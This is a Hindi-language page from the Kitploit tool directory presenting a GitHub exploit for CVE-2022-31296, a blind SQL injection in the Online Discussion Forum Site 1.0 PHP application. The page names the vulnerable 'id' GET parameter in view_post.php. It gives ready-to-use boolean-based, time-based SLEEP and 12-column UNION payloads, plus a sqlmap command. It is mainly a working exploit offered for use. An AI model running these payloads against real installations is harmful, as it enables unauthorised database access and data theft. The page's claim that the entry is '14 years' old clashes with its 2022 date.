Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/bigzooooz/cve-2022-31296
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubbigzooooz/cve-2022-31296

CVE-2022-31296

ऑनलाइन चर्चा मंच साइट 1.0 - ब्लाइंड SQL इंजेक्शन

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-31296

ऑनलाइन चर्चा मंच साइट 1.0 - ब्लाइंड SQL इंजेक्शन

शोषण शीर्षक: ऑनलाइन चर्चा मंच साइट 1.0 - ब्लाइंड SQL इंजेक्शन

दिनांक: 2022-06-13

CVE: CVE-2022-31296

शोषण लेखक: Abdulaziz Saad (@b4zb0z)

विक्रेता होमपेज: https://www.sourcecodester.com/

सॉफ्टवेयर लिंक:

https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html

संस्करण: 1.0

परीक्षित: LAMP, Ubuntu


[#] भेद्यता स्थान: $_GET['id'] in /odfs/posts/view_post.php:3

root@kitploit:~
पैरामीटर: id (GET)
root@kitploit:~
प्रकार: boolean-based blind
शीर्षक: AND boolean-based blind - WHERE or HAVING clause
पेलोड: p=posts/view_post&id=1' AND 8036=8036 AND 'zhKq'='zhKq
root@kitploit:~
प्रकार: time-based blind
root@kitploit:~
शीर्षक: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
पेलोड: p=posts/view_post&id=1' AND (SELECT 4593 FROM (SELECT(SLEEP(5)))Tmcg) AND 'qyDN'='qyDN
root@kitploit:~
प्रकार: UNION query
root@kitploit:~
शीर्षक: Generic UNION query (NULL) - 12 columns
पेलोड: p=posts/view_post&id=-5399' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171767671,0x5a7272534b4b78734a53464e62454b52617876484e6670665570454454526a6963626f506e45776e,0x717a707671)-- -

[#] SQLMAP का उपयोग कर शोषण: sqlmap -u "http://localhost/odfs/?p=posts/view_post&id=1" --dbms=mysql

टूल डाउनलोड करें